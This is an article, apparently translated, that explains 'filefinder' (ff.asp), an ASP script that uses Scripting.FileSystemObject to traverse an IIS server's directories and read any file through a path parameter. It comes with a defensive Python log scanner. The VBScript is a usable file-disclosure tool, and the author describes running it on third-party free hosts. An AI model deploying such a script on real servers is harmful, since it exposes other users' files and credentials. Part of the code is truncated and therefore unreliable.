The Scripting.FileSystemObject object is one of the many COM objects provided by scrrun.dll that can be driven from VBScript/JScript. Scripting.FileSystemObject provides convenient access to text files and directories, but it also poses a threat to the data security of an IIS web server.
The filefinder code is simple. It consists of three functions and 30 lines of sequential code.
The most important part is the findfiles function. It calls itself recursively to traverse a directory tree and lists the files that have the specified extension.
Function findfiles(strstartfolder, strext)
    Dim n
    Dim othisfolder
    Dim ofolders
    Dim ofiles
    Dim ofolder
    Dim ofile
    ' If the system administrator has set file system permissions carefully, the following code will raise errors.
    ' Some directories can still be listed, though, so we simply ignore the errors.
    On Error Resume Next
    n = 0
    Response.Write "<b>Searching " & strstartfolder & "</b><br>"
    Set othisfolder = g_fs.GetFolder(strstartfolder)
    Set ofiles = othisfolder.Files
    For Each ofile In ofiles
        ' If the file has the specified extension, output a link back to this script with a different cmd command.
        ' Here cmd = read, i.e. read the text file at the given physical path.
        If issuffix(ofile.Path, strext) Then
            Response.Write "<a target=_blank href='ff.asp?cmd=read&path=" & Server.HTMLEncode(ofile.Path) & "'><font color='dodgerblue'>" & ofile.Path & "</font></a><br>"
            If Err = 0 Then
                n = n + 1
            End If
        End If
    Next
    Set ofolders = othisfolder.SubFolders
    For Each ofolder In ofolders
        n = n + findfiles(ofolder.Path, strext)
    Next
    findfiles = n
End Function
The following code parses the parameters in the URL query string:
' Read the value of each parameter
strcmd = UCase(Request.QueryString("cmd"))
strpath = Request.QueryString("path")
strext = Request.QueryString("ext")
brawdata = UCase(Request.QueryString("raw"))
' By default, search for .asp files
If strpath = "" Then
    strpath = "."
End If
If strext = "" Then
    strext = ".asp"
End If
' Run different code depending on the cmd command
' (cmd and raw are upper-cased above, so compare against upper-case literals)
Select Case strcmd
    Case "FIND"
        Response.Write findfiles(strpath, strext) & " file(s) found"
    Case "READ"
        If brawdata = "T" Then
            Response.Write readtextfile(strpath)
        Else
            Response.Write "<pre>" & Server.HTMLEncode(readtextfile(strpath)) & "</pre>"
        End If
    Case Else
        Response.Write "
End Select
From the above analysis, we can see that, given sufficient permissions, filefinder can find any text file on the IIS web server and display its content. For non-text files, it can determine whether they exist and where they are located. This information is sometimes extremely important for advanced hackers.
However, the precondition for these threats to data security is that the user who executes ff.asp has at least permission to read directories and files. Because the default security settings of Windows NT Server after installation allow all users to "read" directories and files, any account, whether the default IIS user IUSR_ServerName or another user, can read directory and file information. Most Windows NT Server system administrators are mainly concerned with whether the system runs, and are generally unwilling to change the default directory and file permissions. After all, doing so carries considerable risk and requires a lot of experience. Therefore, filefinder can be used to check whether the file system of an NT server acting as a web server is securely configured.
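The links that findfiles emits pass a physical path in the query string (ff.asp?cmd=read&path=...), so use of such a script leaves a recognizable trace in the IIS access log. The following Python code is an added example, not part of the original article: it scans a W3C extended format log for .asp requests whose parameters carry a physical Windows path and groups them by client and script. The log lines, the field layout and the function name are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample in IIS W3C extended log format (not real traffic).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-04 10:01:12 192.0.2.10 GET /default.asp - 200
2001-05-04 10:02:40 192.0.2.77 GET /user1/ff.asp cmd=find&path=C:%5C&ext=.asp 200
2001-05-04 10:02:55 192.0.2.77 GET /user1/ff.asp cmd=read&path=D:\Inetpub\user2\default.asp 200
2001-05-04 10:03:30 192.0.2.10 GET /news.asp id=42&path=archive 200
#Fields: date time cs-uri-stem cs-uri-query c-ip sc-status
2001-05-04 10:05:01 /user1/ff.asp cmd=read&path=E:%5Cdata%5Creadme.txt&raw=t 192.0.2.77 403
"""

# Decoded parameter value that is a physical Windows path (drive letter or UNC).
PHYSICAL_PATH = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\)")

def physical_path_requests(log_text):
    """Group .asp requests whose query string carries a physical path,
    keyed by (client IP, script), as lists of (status, parameter, path)."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # the column layout may change mid-file
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        stem, query = row.get("cs-uri-stem", ""), row.get("cs-uri-query", "-")
        if query == "-" or not stem.lower().endswith(".asp"):
            continue
        # parse_qsl percent-decodes values, so C:%5C and C:\ are treated alike.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if PHYSICAL_PATH.match(value):
                key = (row.get("c-ip"), stem)
                hits[key].append((row.get("sc-status"), name, value))
    return dict(hits)

if __name__ == "__main__":
    for (ip, script), reqs in physical_path_requests(SAMPLE_LOG).items():
        print(ip, script, len(reqs), "request(s) with physical paths")
        for status, name, value in reqs:
            print("   ", status, name, "=", value)
```

A 403 status on such a request, as in the last sample line, indicates that file system permissions blocked the read, which is the outcome the permission changes discussed above aim for.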
The author set the file system permissions on the IIS web server manually. However, due to lack of experience, this caused many strange errors, for example: the NT Server 4.0 used in the experiment could not connect to the Access database. These functions worked normally before the file system permissions were changed.
For purely research purposes, the author also ran a test on the free ASP space I applied for (including my personal homepage provided by CSDN). As a result, filefinder ran smoothly. The personal home page applied for at http://www2.domaindlx.com/index.html, however, does not have this problem, which shows that this free ASP home page provider takes the matter more seriously. Although the domaindlx web server runs on Windows 2000 Server, its default file system security permissions are not significantly different from those of NT 4.0.
Given the limited ability of the author, the discussion of this issue ends here. This document is intended only as a reference for ASP homepage providers in China, in the hope of helping both providers and customers with data security.
Appendix: web services that run other, similar server-side scripts should have the same problem on any platform if they also provide something like Scripting.FileSystemObject for file system operations.